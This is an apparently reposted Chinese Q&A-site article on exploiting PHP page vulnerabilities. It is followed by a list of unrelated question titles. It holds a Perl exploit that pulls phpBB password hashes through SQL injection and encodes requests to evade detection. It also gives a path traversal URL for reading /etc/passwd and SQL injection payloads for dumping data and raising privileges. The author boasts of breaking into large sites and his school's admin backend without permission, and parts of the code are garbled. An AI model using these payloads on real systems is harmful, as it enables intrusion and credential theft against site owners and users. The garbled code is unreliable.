问答文章1 问答文章501 问答文章1001 问答文章1501 问答文章2001 问答文章2501 问答文章3001 问答文章3501 问答文章4001 问答文章4501 问答文章5001 问答文章5501 问答文章6001 问答文章6501 问答文章7001 问答文章7501 问答文章8001 问答文章8501 问答文章9001 问答文章9501

php页面漏洞分析及相关问题解决

发布网友 发布时间:2022-04-22 09:57

我来回答

1个回答

热心网友 时间:2023-10-09 14:48


从现在的网络安全来看,大家最关注和接触最多的WEB页面漏洞应该是ASP了,在这方面,小竹是专家,我没发言权。然而在PHP方面来看,也同样存在很严重的安全问题,但是这方面的文章却不多。在这里,就跟大家来稍微的讨论一下PHP页面的相关漏洞吧。
我对目前常见的PHP漏洞做了一下总结,大致分为以下几种:包含文件漏洞,脚本命令执行漏洞,文件泄露漏洞,SQL注入漏洞等几种。当然,至于COOKIE欺骗等一部分通用的技术就不在这里讨论了,这些资料网上也很多。那么,我们就一个一个来分析一下怎样利用这些漏洞吧!
首先,我们来讨论包含文件漏洞。这个漏洞应该说是PHP独有的吧。这是由于不充分处理外部提供的恶意数据,从而导致远程攻击者可以利用这些漏洞以WEB进程权限在系统上执行任意命令。我们来看一个例子:假设在a.php中有这样一句代码:
以下是引用片段:
include($include."/xxx.php");
?
在这段代码中,$include一般是一个已经设置好的路径,但是我们可以通过自己构造一个路径来达到攻击的目的。比方说我们提交:a.php?include=
接着,我们再来看一下脚本命令执行漏洞。这是由于对用户提交的URI参数缺少充分过滤,提交包含恶意HTML代码的数据,可导致触发跨站脚本攻击,可能获得目标用户的敏感信息。我们也举个例子:在PHP Transparent的PHP PHP 4.3.1以下版本中的index.php页面对PHPSESSID缺少充分的过滤,我们可以通过这样的代码来达到攻击的目的
再然后,我们就来看看文件泄露漏洞了,这种漏洞是由于对用户提交参数缺少充分过滤,远程攻击者可以利用它进行目录遍历攻击以及获取一些敏感信息。我们拿最近发现的phpMyAdmin来做例子。在phpMyAdmin中,export.php页面没有对用户提交的'what'参数进行充分过滤,远程攻击者提交包含多个'../'字符的数据,便可绕过WEB ROOT*,以WEB权限查看系统上的任意文件信息。比方说打入这样一个地址:export.php?what=../../../../../../etc/passwd%00 就可以达到文件泄露的目的了。在这方面相对多一点,有:myPHPNuke,McNews等等。
最后,我们又要回到最兴奋的地方了。想想我们平时在asp页面中用SQL注入有多么爽,以前还要手动注入,一直到小竹悟出"SQL注入密笈"(嘿嘿),然后再开做出NBSI以后,我们NB联盟真是拉出一片天空。曾先后帮CSDN,大富翁论坛,中国频道等大型网站找出漏洞。(这些废话不多说了,有点跑题了...)。
还是言规正传,其实在asp中SQL的注入和php中的SQL注入大致相同,只不过稍微注意一下用的几个函数就好了。将asc改成ASCII,len改成LENGTH,其他函数基本不变了。其实大家看到PHP的SQL注入,是不是都会想到PHP-NUKE和PHPBB呢?不错,俗话说树大招分,像动网这样的论坛在asp界就该是漏洞这王了,这并不是说它的论坛安全太差,而是名气太响,别人用的多了,研究的人也就多了,发现的安全漏洞也就越多了。PHPBB也是一样的,现在很大一部分人用PHP做论坛的话,一般都是选择了PHPBB。它的漏洞也是一直在出,从最早 phpBB 1.4.0版本被人发现漏洞,到现在最近的phpBB 2.0.6版本的groupcp.php,,以及之前发现的search.php,profile.php,viewtopic.php等等加起来,大概也有十来个样子吧。这也一直导致,一部分人在研究php漏洞的时候都会拿它做实验品,所谓百练成精嘛,相信以后的PHPBB会越来越好。
好了,我们还是来分析一下漏洞产生的原因吧。拿viewtopic.php页面来说,由于在调用viewtopic.php时,直接从GET请求中获得"topic_id"并传递给SQL查询命令,而并没有进行一些过滤的处理,攻击者可以提交特殊的SQL字符串用于获得MD5密码,获得此密码信息可以用于自动登录或者进行暴力破解。(我想应该不会有人想去暴力破解吧,除非有特别重要的原因)。先看一下相关源代码:
以下是引用片段:
#
 if(isset($HTTP_GET_VARS[POST_TOPIC_URL]))
#
 {
#
 $topic_id=intval($HTTP_GET_VARS[POST_TOPIC_URL]);
#
 }
#
 elseif(isset($HTTP_GET_VARS['topic']))
#
 {
#
 $topic_id=intval($HTTP_GET_VARS['topic']);
#
 }
从上面我们可以看出,如果提交的view=newest并且sid设置了值的话,执行的查询代码像下面的这个样子(如果你还没看过PHPBB源代码的话,建议你看了再对着这里来看,受影响系统为:phpBB 2.0.5和phpBB 2.0.4)。
以下是引用片段:
#
$sql = "SELECT p.post_id
#
FROM " . POSTS_TABLE . " p, " . SESSIONS_TABLE . " s, " . USERS_TABLE . " u
#
WHERE s.session_id = '$session_id'
#
AND u.user_id = s.session_user_id
#
AND p.topic_id = $topic_id
#
AND p.post_time = u.user_lastvisit
#
ORDER BY p.post_time ASC
#
LIMIT 1";
Rick提供了下面的这断测试代码:
use IO::Socket;
$remote = shift || 'localhost';
$view_topic = shift || '/phpBB2/viewtopic.php';
$uid = shift || 2;
$port = 80;
$dBType = 'mysql4';
# mysql4 or pgsql
print "Trying to get password hash for uid $uid server $remote dbtype: $dBType ";
$p = "";
for($index=1; $index=32; $index++)
{
$socket = IO::Socket::INET-new(PeerAddr = $remote,
PeerPort = $port,
Proto = "tcp",
Type = SOCK_STREAM)
or die "Couldnt connect to $remote:$port : $@ ";
$str = "GET $view_topic" . "?sid=1topic_id=-1" . random_encode(make_dbsql()) . "view=newest" . " HTTP/1.0 ";
print $socket $str;
print $socket "Cookie: phpBB2mysql_sid=1 ";
# replace this for pgsql or remove it
print $socket "Host: $remote ";
while ($answer = $socket)
{
if ($answer =~ /location:.*x23(d+)/) # Matches the location: viewtopic.php?p=#
{
$p .= chr ();
}
}
close($socket);
}
print " MD5 Hash for uid $uid is $p ";
# random encode str. helps avoid detection
sub random_encode
{
$str = shift;
$ret = "";
for($i=0; $i
{
$c = substr($str,$i,1);
$j = rand length($str) * 1000;
if (int($j) % 2 || $c eq ' ')
{
$ret .= "%" . sprintf("%x",ord($c));
}
#p#副标题#e#
else
{
$ret .= $c;
}
}
return $ret;
}
sub make_dbsql
{
if ($dBType eq 'mysql4')
{
return " union select ord(substring(user_password," . $index . ",1)) from phpbb_users where user_id=$uid/*" ;
} elsif ($dBType eq 'pgsql')
{
return "; select ascii(substring(user_password from $index for 1)) as post_id from phpbb_posts p, phpbb_users u where u.user_id=$uid or false";
}
else
{
return "";
}
}
这段代码,我就不多做解释了.作用是获得HASH值.
看到这里,大家可能有点疑问,为什么我前面讲的那些改的函数怎么没有用到,我讲出来不怕大家笑话:其实网上很多站点有些页面的查询语句看起来会是这样:
display.php?sqlsave=select+*+from+aaa+where+xx=yy+order+by+bbb+desc
不要笑,这是真的,我还靠这个进过几个大型网站.至于哪一些,不好讲出来,不过我们学校的网站,我就是靠这个进后台的,把前面那函数用上吧.不然你只有改人家的密码了哦!!!
差点忘了一点,在SQL注入的时候,PHP与ASP有所不同,mysql对sql语句的运用没有mssql灵活,因此,很多在mssql上可以用的查询语句在mysql中都不能奏效了. 一般我们常见的注入语句像这样:aaa.php?id=a' into outfile 'pass.txt或是aaa.php?id=a' into outfile 'pass.txt' /*再进一步可以改成:aaa.php?id=a' or 1=1 union select id,name,password form users into outfile 'c:/a.txt
这样可以将数据库数据导出为文件,然后可以查看.
或是这样:mode=',user_level='4
这个语句一般用在修改资料时,假设页面存在漏洞的话,就可以达到提升权限的做用.
其它的如' OR 1=1 -- 或者:1' or 1='1则跟asp差不多.这里不多讲了.在php里面,SQL注入看来还是漏洞之首啊,有太多的页面存在这个问题了.
其实大家可以看出来,上面那些分类归根结底只有一个原因:提交参数没过滤或是过滤不够严谨.
#p#副标题#e#
声明声明:本网页内容为用户发布,旨在传播知识,不代表本网认同其观点,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。E-MAIL:11247931@qq.com
宜宾陪产假有多少天 ...19宽屏显示器。调色彩时有个选项magicColor是什么意思? eternuer是什么意思 《法语助手》法汉 癌症老人能吃山竹吗 癌症病人能吃抗氧化剂吗 乳腺癌骨转移病人吃什么水果好 肝癌老人吃山竹有害处吗 癌症病人能不能吃山竹 如何在excel中批量加入数据 在Excel中怎样批量加上一? 青岛到菏泽的火车是几点 卡地亚蓝气球系列W6920034腕表,二手价格怎么样? 从济南到聊城的火车票多少钱啊? 安全漏洞的检查方法 华为荣耀9x摄像头升不起来怎么办? 卡地亚蓝气球系w69012z4多少钱 linux下,学习漏洞分析有什么好书推荐不? 5026次火车九号车厢座位顺序 卡地亚蓝气球系列W69012Z4腕表表盘上不带AUTOMATIC的是正品吗? 计算机网络安全漏洞及防范措施分析 青岛一一临沂火车时刻 卡地亚-蓝气球系列 W6920046 女士能带吗 淘宝怎么卡地区 郑欣宜的妈妈是哪位已故有“开心果”之称的香港著名艺人? 卡地亚手表怎么样?卡地亚手表值得买吗? 几种漏洞发现技术简介 青岛北站5026沂南的火车上能不能抽烟 郑欣宜在我不是明星中说她妈妈最喜欢听得歌叫什么 卡地亚蓝气球系列W69011Z4石英男表有秒针吗 郑欣宜献给妈妈的歌歌曲名叫撒 有谁看过 我不是歌星 漏洞分析和web渗透哪个前景好 青岛至兖州的火车时刻表 请问青岛去莒县晚上有没有火车啊,几点的? 顾泰旗的个人资料 中国反传销网资金漏洞分析 请问青岛到梁山有哪些火车是经过即墨蓝村火车站的?最好是晚上。谢谢! 家具设计师需要具备哪些条件 如何选择扫描工具并进行安全漏洞扫描 青岛到费县坐火车怎么转? 在账号注册功能中,可能存在哪些漏洞 建筑设计和室内设计有什么区别? 从淄博到北京的火车都是几点的车票多少前? ue关卡蓝图只能做一个吗 女主是设计师姓顾离开他五年的言情小说 深信服防火墙的实时漏洞分析功能如何申请序列号 白天从胶州到济南的火车几点的 家装设计师是干什么的? 济南到聊城火车时间表 怎样成为一名家具设计师 漏洞有哪几种